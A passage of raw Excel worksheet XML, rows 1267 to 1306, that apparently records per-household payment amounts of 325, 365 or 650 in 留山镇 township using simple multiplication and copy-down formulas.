      <c r="G1267" s="17">
        <v>2</v>
      </c>
      <c r="H1267" s="18">
        <v>325</v>
      </c>
      <c r="I1267" s="17">
        <f>H1267*G1267</f>
        <v>650</v>
      </c>
      <c r="J1267" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1267" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1268" customHeight="1" spans="1:11">
      <c r="A1268" s="16" t="s">
        <v>3396</v>
      </c>
      <c r="B1268" s="17" t="str">
        <f>B1267</f>
        <v>留山镇</v>
      </c>
      <c r="C1268" s="17" t="str">
        <f>C1267</f>
        <v>留山镇</v>
      </c>
      <c r="D1268" s="16" t="s">
        <v>3397</v>
      </c>
      <c r="E1268" s="16" t="s">
        <v>3398</v>
      </c>
      <c r="F1268" s="17">
        <f>F1267</f>
        <v>4113210399</v>
      </c>
      <c r="G1268" s="17"/>
      <c r="H1268" s="17"/>
      <c r="I1268" s="17"/>
      <c r="J1268" s="17"/>
      <c r="K1268" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1269" customHeight="1" spans="1:11">
      <c r="A1269" s="16" t="s">
        <v>3399</v>
      </c>
      <c r="B1269" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1269" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1269" s="17" t="s">
        <v>3400</v>
      </c>
      <c r="E1269" s="17" t="s">
        <v>3401</v>
      </c>
      <c r="F1269" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1269" s="17">
        <v>1</v>
      </c>
      <c r="H1269" s="18">
        <v>365</v>
      </c>
      <c r="I1269" s="17">
        <f>H1269*G1269</f>
        <v>365</v>
      </c>
      <c r="J1269" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1269" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1270" customHeight="1" spans="1:11">
      <c r="A1270" s="16" t="s">
        <v>3402</v>
      </c>
      <c r="B1270" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1270" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1270" s="17" t="s">
        <v>3403</v>
      </c>
      <c r="E1270" s="17" t="s">
        <v>3211</v>
      </c>
      <c r="F1270" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1270" s="17">
        <v>2</v>
      </c>
      <c r="H1270" s="18">
        <v>325</v>
      </c>
      <c r="I1270" s="17">
        <f>H1270*G1270</f>
        <v>650</v>
      </c>
      <c r="J1270" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1270" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1271" customHeight="1" spans="1:11">
      <c r="A1271" s="16" t="s">
        <v>3404</v>
      </c>
      <c r="B1271" s="17" t="str">
        <f>B1270</f>
        <v>留山镇</v>
      </c>
      <c r="C1271" s="17" t="str">
        <f>C1270</f>
        <v>留山镇</v>
      </c>
      <c r="D1271" s="16" t="s">
        <v>3405</v>
      </c>
      <c r="E1271" s="16" t="s">
        <v>3406</v>
      </c>
      <c r="F1271" s="17">
        <f>F1270</f>
        <v>4113210399</v>
      </c>
      <c r="G1271" s="17"/>
      <c r="H1271" s="17"/>
      <c r="I1271" s="17"/>
      <c r="J1271" s="17"/>
      <c r="K1271" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1272" customHeight="1" spans="1:11">
      <c r="A1272" s="16" t="s">
        <v>3407</v>
      </c>
      <c r="B1272" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1272" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1272" s="17" t="s">
        <v>3408</v>
      </c>
      <c r="E1272" s="17" t="s">
        <v>3409</v>
      </c>
      <c r="F1272" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1272" s="17">
        <v>1</v>
      </c>
      <c r="H1272" s="18">
        <v>365</v>
      </c>
      <c r="I1272" s="17">
        <f>H1272*G1272</f>
        <v>365</v>
      </c>
      <c r="J1272" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1272" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1273" customHeight="1" spans="1:11">
      <c r="A1273" s="16" t="s">
        <v>3410</v>
      </c>
      <c r="B1273" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1273" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1273" s="17" t="s">
        <v>3411</v>
      </c>
      <c r="E1273" s="17" t="s">
        <v>3412</v>
      </c>
      <c r="F1273" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1273" s="17">
        <v>1</v>
      </c>
      <c r="H1273" s="18">
        <v>365</v>
      </c>
      <c r="I1273" s="17">
        <f>H1273*G1273</f>
        <v>365</v>
      </c>
      <c r="J1273" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1273" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1274" customHeight="1" spans="1:11">
      <c r="A1274" s="16" t="s">
        <v>3413</v>
      </c>
      <c r="B1274" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1274" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1274" s="17" t="s">
        <v>3414</v>
      </c>
      <c r="E1274" s="17" t="s">
        <v>3220</v>
      </c>
      <c r="F1274" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1274" s="17">
        <v>2</v>
      </c>
      <c r="H1274" s="18">
        <v>325</v>
      </c>
      <c r="I1274" s="17">
        <f>H1274*G1274</f>
        <v>650</v>
      </c>
      <c r="J1274" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1274" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1275" customHeight="1" spans="1:11">
      <c r="A1275" s="16" t="s">
        <v>3415</v>
      </c>
      <c r="B1275" s="17" t="str">
        <f>B1274</f>
        <v>留山镇</v>
      </c>
      <c r="C1275" s="17" t="str">
        <f>C1274</f>
        <v>留山镇</v>
      </c>
      <c r="D1275" s="16" t="s">
        <v>3416</v>
      </c>
      <c r="E1275" s="16" t="s">
        <v>3250</v>
      </c>
      <c r="F1275" s="17">
        <f>F1274</f>
        <v>4113210399</v>
      </c>
      <c r="G1275" s="17"/>
      <c r="H1275" s="17"/>
      <c r="I1275" s="17"/>
      <c r="J1275" s="17"/>
      <c r="K1275" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1276" customHeight="1" spans="1:11">
      <c r="A1276" s="16" t="s">
        <v>3417</v>
      </c>
      <c r="B1276" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1276" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1276" s="17" t="s">
        <v>3418</v>
      </c>
      <c r="E1276" s="17" t="s">
        <v>3419</v>
      </c>
      <c r="F1276" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1276" s="17">
        <v>1</v>
      </c>
      <c r="H1276" s="18">
        <v>365</v>
      </c>
      <c r="I1276" s="17">
        <f>H1276*G1276</f>
        <v>365</v>
      </c>
      <c r="J1276" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1276" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1277" customHeight="1" spans="1:11">
      <c r="A1277" s="16" t="s">
        <v>3420</v>
      </c>
      <c r="B1277" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1277" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1277" s="17" t="s">
        <v>3421</v>
      </c>
      <c r="E1277" s="17" t="s">
        <v>3220</v>
      </c>
      <c r="F1277" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1277" s="17">
        <v>1</v>
      </c>
      <c r="H1277" s="18">
        <v>365</v>
      </c>
      <c r="I1277" s="17">
        <f>H1277*G1277</f>
        <v>365</v>
      </c>
      <c r="J1277" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1277" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1278" customHeight="1" spans="1:11">
      <c r="A1278" s="16" t="s">
        <v>3422</v>
      </c>
      <c r="B1278" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1278" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1278" s="17" t="s">
        <v>3423</v>
      </c>
      <c r="E1278" s="17" t="s">
        <v>3214</v>
      </c>
      <c r="F1278" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1278" s="17">
        <v>1</v>
      </c>
      <c r="H1278" s="18">
        <v>365</v>
      </c>
      <c r="I1278" s="17">
        <f>H1278*G1278</f>
        <v>365</v>
      </c>
      <c r="J1278" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1278" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1279" customHeight="1" spans="1:11">
      <c r="A1279" s="16" t="s">
        <v>3424</v>
      </c>
      <c r="B1279" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1279" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1279" s="17" t="s">
        <v>3425</v>
      </c>
      <c r="E1279" s="17" t="s">
        <v>3426</v>
      </c>
      <c r="F1279" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1279" s="17">
        <v>1</v>
      </c>
      <c r="H1279" s="18">
        <v>365</v>
      </c>
      <c r="I1279" s="17">
        <f>H1279*G1279</f>
        <v>365</v>
      </c>
      <c r="J1279" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1279" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1280" customHeight="1" spans="1:11">
      <c r="A1280" s="16" t="s">
        <v>3427</v>
      </c>
      <c r="B1280" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1280" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1280" s="17" t="s">
        <v>3428</v>
      </c>
      <c r="E1280" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F1280" s="17" t="s">
        <v>3429</v>
      </c>
      <c r="G1280" s="17">
        <v>1</v>
      </c>
      <c r="H1280" s="18">
        <v>365</v>
      </c>
      <c r="I1280" s="17">
        <f t="shared" ref="I1280:I1294" si="62">H1280*G1280</f>
        <v>365</v>
      </c>
      <c r="J1280" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1280" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1281" customHeight="1" spans="1:11">
      <c r="A1281" s="16" t="s">
        <v>3430</v>
      </c>
      <c r="B1281" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1281" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1281" s="17" t="s">
        <v>3431</v>
      </c>
      <c r="E1281" s="17" t="s">
        <v>3220</v>
      </c>
      <c r="F1281" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1281" s="17">
        <v>1</v>
      </c>
      <c r="H1281" s="18">
        <v>365</v>
      </c>
      <c r="I1281" s="17">
        <f t="shared" si="62"/>
        <v>365</v>
      </c>
      <c r="J1281" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1281" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1282" customHeight="1" spans="1:11">
      <c r="A1282" s="16" t="s">
        <v>3432</v>
      </c>
      <c r="B1282" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1282" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1282" s="17" t="s">
        <v>3433</v>
      </c>
      <c r="E1282" s="17" t="s">
        <v>3434</v>
      </c>
      <c r="F1282" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1282" s="17">
        <v>1</v>
      </c>
      <c r="H1282" s="18">
        <v>365</v>
      </c>
      <c r="I1282" s="17">
        <f t="shared" si="62"/>
        <v>365</v>
      </c>
      <c r="J1282" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1282" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1283" customHeight="1" spans="1:11">
      <c r="A1283" s="16" t="s">
        <v>3435</v>
      </c>
      <c r="B1283" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1283" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D1283" s="17" t="s">
        <v>3437</v>
      </c>
      <c r="E1283" s="17" t="s">
        <v>3438</v>
      </c>
      <c r="F1283" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1283" s="17">
        <v>1</v>
      </c>
      <c r="H1283" s="18">
        <v>365</v>
      </c>
      <c r="I1283" s="17">
        <f t="shared" si="62"/>
        <v>365</v>
      </c>
      <c r="J1283" s="29">
        <v>45108</v>
      </c>
      <c r="K1283" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1284" customHeight="1" spans="1:11">
      <c r="A1284" s="16" t="s">
        <v>3439</v>
      </c>
      <c r="B1284" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1284" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D1284" s="17" t="s">
        <v>3440</v>
      </c>
      <c r="E1284" s="17" t="s">
        <v>3441</v>
      </c>
      <c r="F1284" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1284" s="17">
        <v>1</v>
      </c>
      <c r="H1284" s="18">
        <v>365</v>
      </c>
      <c r="I1284" s="17">
        <f t="shared" si="62"/>
        <v>365</v>
      </c>
      <c r="J1284" s="29">
        <v>45108</v>
      </c>
      <c r="K1284" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1285" customHeight="1" spans="1:11">
      <c r="A1285" s="16" t="s">
        <v>3442</v>
      </c>
      <c r="B1285" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1285" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D1285" s="17" t="s">
        <v>3443</v>
      </c>
      <c r="E1285" s="17" t="s">
        <v>3444</v>
      </c>
      <c r="F1285" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1285" s="17">
        <v>1</v>
      </c>
      <c r="H1285" s="18">
        <v>365</v>
      </c>
      <c r="I1285" s="17">
        <f t="shared" si="62"/>
        <v>365</v>
      </c>
      <c r="J1285" s="29">
        <v>45108</v>
      </c>
      <c r="K1285" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1286" customHeight="1" spans="1:11">
      <c r="A1286" s="16" t="s">
        <v>3445</v>
      </c>
      <c r="B1286" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1286" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D1286" s="17" t="s">
        <v>3446</v>
      </c>
      <c r="E1286" s="17" t="s">
        <v>3372</v>
      </c>
      <c r="F1286" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1286" s="17">
        <v>1</v>
      </c>
      <c r="H1286" s="18">
        <v>365</v>
      </c>
      <c r="I1286" s="17">
        <f t="shared" si="62"/>
        <v>365</v>
      </c>
      <c r="J1286" s="29">
        <v>45108</v>
      </c>
      <c r="K1286" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1287" customHeight="1" spans="1:11">
      <c r="A1287" s="16" t="s">
        <v>3447</v>
      </c>
      <c r="B1287" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1287" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D1287" s="17" t="s">
        <v>3449</v>
      </c>
      <c r="E1287" s="17" t="s">
        <v>3450</v>
      </c>
      <c r="F1287" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1287" s="17">
        <v>1</v>
      </c>
      <c r="H1287" s="18">
        <v>365</v>
      </c>
      <c r="I1287" s="17">
        <f t="shared" si="62"/>
        <v>365</v>
      </c>
      <c r="J1287" s="29">
        <v>45108</v>
      </c>
      <c r="K1287" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1288" customHeight="1" spans="1:11">
      <c r="A1288" s="16" t="s">
        <v>3451</v>
      </c>
      <c r="B1288" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1288" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D1288" s="17" t="s">
        <v>3452</v>
      </c>
      <c r="E1288" s="17" t="s">
        <v>3331</v>
      </c>
      <c r="F1288" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1288" s="17">
        <v>1</v>
      </c>
      <c r="H1288" s="18">
        <v>365</v>
      </c>
      <c r="I1288" s="17">
        <f t="shared" si="62"/>
        <v>365</v>
      </c>
      <c r="J1288" s="29">
        <v>45108</v>
      </c>
      <c r="K1288" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1289" customHeight="1" spans="1:11">
      <c r="A1289" s="16" t="s">
        <v>3453</v>
      </c>
      <c r="B1289" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1289" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D1289" s="17" t="s">
        <v>3454</v>
      </c>
      <c r="E1289" s="17" t="s">
        <v>3455</v>
      </c>
      <c r="F1289" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1289" s="17">
        <v>1</v>
      </c>
      <c r="H1289" s="18">
        <v>365</v>
      </c>
      <c r="I1289" s="17">
        <f t="shared" si="62"/>
        <v>365</v>
      </c>
      <c r="J1289" s="29">
        <v>45108</v>
      </c>
      <c r="K1289" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1290" customHeight="1" spans="1:11">
      <c r="A1290" s="16" t="s">
        <v>3456</v>
      </c>
      <c r="B1290" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1290" s="17" t="s">
        <v>3457</v>
      </c>
      <c r="D1290" s="17" t="s">
        <v>3458</v>
      </c>
      <c r="E1290" s="17" t="s">
        <v>3459</v>
      </c>
      <c r="F1290" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1290" s="17">
        <v>1</v>
      </c>
      <c r="H1290" s="18">
        <v>365</v>
      </c>
      <c r="I1290" s="17">
        <f t="shared" si="62"/>
        <v>365</v>
      </c>
      <c r="J1290" s="29">
        <v>45108</v>
      </c>
      <c r="K1290" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1291" customHeight="1" spans="1:11">
      <c r="A1291" s="16" t="s">
        <v>3460</v>
      </c>
      <c r="B1291" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1291" s="17" t="s">
        <v>3457</v>
      </c>
      <c r="D1291" s="17" t="s">
        <v>3461</v>
      </c>
      <c r="E1291" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F1291" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1291" s="17">
        <v>1</v>
      </c>
      <c r="H1291" s="18">
        <v>365</v>
      </c>
      <c r="I1291" s="17">
        <f t="shared" si="62"/>
        <v>365</v>
      </c>
      <c r="J1291" s="29">
        <v>45108</v>
      </c>
      <c r="K1291" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1292" customHeight="1" spans="1:11">
      <c r="A1292" s="16" t="s">
        <v>3462</v>
      </c>
      <c r="B1292" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1292" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D1292" s="17" t="s">
        <v>3463</v>
      </c>
      <c r="E1292" s="17" t="s">
        <v>3274</v>
      </c>
      <c r="F1292" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1292" s="17">
        <v>1</v>
      </c>
      <c r="H1292" s="18">
        <v>365</v>
      </c>
      <c r="I1292" s="17">
        <f t="shared" si="62"/>
        <v>365</v>
      </c>
      <c r="J1292" s="17">
        <v>45139</v>
      </c>
      <c r="K1292" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1293" customHeight="1" spans="1:11">
      <c r="A1293" s="16" t="s">
        <v>3464</v>
      </c>
      <c r="B1293" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1293" s="17" t="s">
        <v>3465</v>
      </c>
      <c r="D1293" s="17" t="s">
        <v>3466</v>
      </c>
      <c r="E1293" s="17" t="s">
        <v>3401</v>
      </c>
      <c r="F1293" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1293" s="17">
        <v>1</v>
      </c>
      <c r="H1293" s="18">
        <v>365</v>
      </c>
      <c r="I1293" s="17">
        <f t="shared" si="62"/>
        <v>365</v>
      </c>
      <c r="J1293" s="17">
        <v>45292</v>
      </c>
      <c r="K1293" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1294" customHeight="1" spans="1:11">
      <c r="A1294" s="16" t="s">
        <v>3467</v>
      </c>
      <c r="B1294" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1294" s="17" t="s">
        <v>3465</v>
      </c>
      <c r="D1294" s="17" t="s">
        <v>3468</v>
      </c>
      <c r="E1294" s="17" t="s">
        <v>3469</v>
      </c>
      <c r="F1294" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1294" s="17">
        <v>2</v>
      </c>
      <c r="H1294" s="18">
        <v>325</v>
      </c>
      <c r="I1294" s="17">
        <f t="shared" si="62"/>
        <v>650</v>
      </c>
      <c r="J1294" s="17">
        <v>45261</v>
      </c>
      <c r="K1294" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1295" customHeight="1" spans="1:11">
      <c r="A1295" s="16" t="s">
        <v>3470</v>
      </c>
      <c r="B1295" s="17" t="str">
        <f>B1294</f>
        <v>留山镇</v>
      </c>
      <c r="C1295" s="17" t="str">
        <f>C1294</f>
        <v>建设居委会</v>
      </c>
      <c r="D1295" s="41" t="s">
        <v>3471</v>
      </c>
      <c r="E1295" s="42" t="s">
        <v>3472</v>
      </c>
      <c r="F1295" s="17">
        <f>F1294</f>
        <v>4113210399</v>
      </c>
      <c r="G1295" s="17"/>
      <c r="H1295" s="17"/>
      <c r="I1295" s="17"/>
      <c r="J1295" s="17"/>
      <c r="K1295" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1296" customHeight="1" spans="1:11">
      <c r="A1296" s="16" t="s">
        <v>3473</v>
      </c>
      <c r="B1296" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1296" s="17" t="s">
        <v>3474</v>
      </c>
      <c r="D1296" s="17" t="s">
        <v>3475</v>
      </c>
      <c r="E1296" s="17" t="s">
        <v>3229</v>
      </c>
      <c r="F1296" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1296" s="17">
        <v>1</v>
      </c>
      <c r="H1296" s="18">
        <v>365</v>
      </c>
      <c r="I1296" s="17">
        <f t="shared" ref="I1296:I1313" si="63">H1296*G1296</f>
        <v>365</v>
      </c>
      <c r="J1296" s="17">
        <v>45352</v>
      </c>
      <c r="K1296" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1297" customHeight="1" spans="1:11">
      <c r="A1297" s="16" t="s">
        <v>3476</v>
      </c>
      <c r="B1297" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1297" s="17" t="s">
        <v>3457</v>
      </c>
      <c r="D1297" s="17" t="s">
        <v>3477</v>
      </c>
      <c r="E1297" s="17" t="s">
        <v>3229</v>
      </c>
      <c r="F1297" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1297" s="17">
        <v>1</v>
      </c>
      <c r="H1297" s="18">
        <v>365</v>
      </c>
      <c r="I1297" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1297" s="17">
        <v>45352</v>
      </c>
      <c r="K1297" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1298" customHeight="1" spans="1:11">
      <c r="A1298" s="16" t="s">
        <v>3478</v>
      </c>
      <c r="B1298" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1298" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D1298" s="17" t="s">
        <v>3479</v>
      </c>
      <c r="E1298" s="17" t="s">
        <v>3334</v>
      </c>
      <c r="F1298" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1298" s="17">
        <v>1</v>
      </c>
      <c r="H1298" s="18">
        <v>365</v>
      </c>
      <c r="I1298" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1298" s="17">
        <v>45170</v>
      </c>
      <c r="K1298" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1299" customHeight="1" spans="1:11">
      <c r="A1299" s="16" t="s">
        <v>3480</v>
      </c>
      <c r="B1299" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1299" s="17" t="s">
        <v>3465</v>
      </c>
      <c r="D1299" s="17" t="s">
        <v>3481</v>
      </c>
      <c r="E1299" s="17" t="s">
        <v>3482</v>
      </c>
      <c r="F1299" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1299" s="17">
        <v>1</v>
      </c>
      <c r="H1299" s="18">
        <v>365</v>
      </c>
      <c r="I1299" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1299" s="29">
        <v>45474</v>
      </c>
      <c r="K1299" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1300" customHeight="1" spans="1:11">
      <c r="A1300" s="16" t="s">
        <v>3483</v>
      </c>
      <c r="B1300" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1300" s="31" t="s">
        <v>3484</v>
      </c>
      <c r="D1300" s="41" t="s">
        <v>3485</v>
      </c>
      <c r="E1300" s="17" t="s">
        <v>3486</v>
      </c>
      <c r="F1300" s="43">
        <v>4113210309</v>
      </c>
      <c r="G1300" s="17">
        <v>1</v>
      </c>
      <c r="H1300" s="18">
        <v>365</v>
      </c>
      <c r="I1300" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1300" s="29">
        <v>45566</v>
      </c>
      <c r="K1300" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1301" customHeight="1" spans="1:11">
      <c r="A1301" s="16" t="s">
        <v>3487</v>
      </c>
      <c r="B1301" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1301" s="17" t="s">
        <v>3488</v>
      </c>
      <c r="D1301" s="17" t="s">
        <v>3489</v>
      </c>
      <c r="E1301" s="17" t="s">
        <v>2478</v>
      </c>
      <c r="F1301" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1301" s="17">
        <v>1</v>
      </c>
      <c r="H1301" s="18">
        <v>365</v>
      </c>
      <c r="I1301" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1301" s="17">
        <v>45170</v>
      </c>
      <c r="K1301" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1302" customHeight="1" spans="1:11">
      <c r="A1302" s="16" t="s">
        <v>3490</v>
      </c>
      <c r="B1302" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1302" s="17" t="s">
        <v>3465</v>
      </c>
      <c r="D1302" s="17" t="s">
        <v>3491</v>
      </c>
      <c r="E1302" s="17" t="s">
        <v>3492</v>
      </c>
      <c r="F1302" s="44" t="s">
        <v>3493</v>
      </c>
      <c r="G1302" s="17">
        <v>1</v>
      </c>
      <c r="H1302" s="18">
        <v>365</v>
      </c>
      <c r="I1302" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1302" s="29">
        <v>45627</v>
      </c>
      <c r="K1302" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1303" customHeight="1" spans="1:11">
      <c r="A1303" s="16" t="s">
        <v>3494</v>
      </c>
      <c r="B1303" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1303" s="17" t="s">
        <v>3495</v>
      </c>
      <c r="D1303" s="17" t="s">
        <v>3496</v>
      </c>
      <c r="E1303" s="17" t="s">
        <v>3214</v>
      </c>
      <c r="F1303" s="44" t="s">
        <v>3493</v>
      </c>
      <c r="G1303" s="17">
        <v>1</v>
      </c>
      <c r="H1303" s="18">
        <v>365</v>
      </c>
      <c r="I1303" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1303" s="29">
        <v>45627</v>
      </c>
      <c r="K1303" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1304" customHeight="1" spans="1:11">
      <c r="A1304" s="16" t="s">
        <v>3497</v>
      </c>
      <c r="B1304" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1304" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D1304" s="17" t="s">
        <v>3498</v>
      </c>
      <c r="E1304" s="17" t="s">
        <v>3438</v>
      </c>
      <c r="F1304" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1304" s="17">
        <v>1</v>
      </c>
      <c r="H1304" s="18">
        <v>365</v>
      </c>
      <c r="I1304" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1304" s="17">
        <v>45200</v>
      </c>
      <c r="K1304" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1305" customHeight="1" spans="1:11">
      <c r="A1305" s="16" t="s">
        <v>3499</v>
      </c>
      <c r="B1305" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1305" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1305" s="17" t="s">
        <v>3501</v>
      </c>
      <c r="E1305" s="17" t="s">
        <v>3502</v>
      </c>
      <c r="F1305" s="17" t="s">
        <v>3503</v>
      </c>
      <c r="G1305" s="17">
        <v>1</v>
      </c>
      <c r="H1305" s="18">
        <v>365</v>
      </c>
      <c r="I1305" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1305" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1305" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1306" customHeight="1" spans="1:11">
      <c r="A1306" s="16" t="s">
        <v>3504</v>
      </c>
      <c r="B1306" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1306" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1306" s="17" t="s">
        <v>3505</v>
      </c>
      <c r="E1306" s="17" t="s">
        <v>3506</v>
      </c>
      <c r="F1306" s="17" t="s">
        <v>3503</v>
      </c>
      <c r="G1306" s="17">
        <v>1</v>
      </c>
      <c r="H1306" s="18">
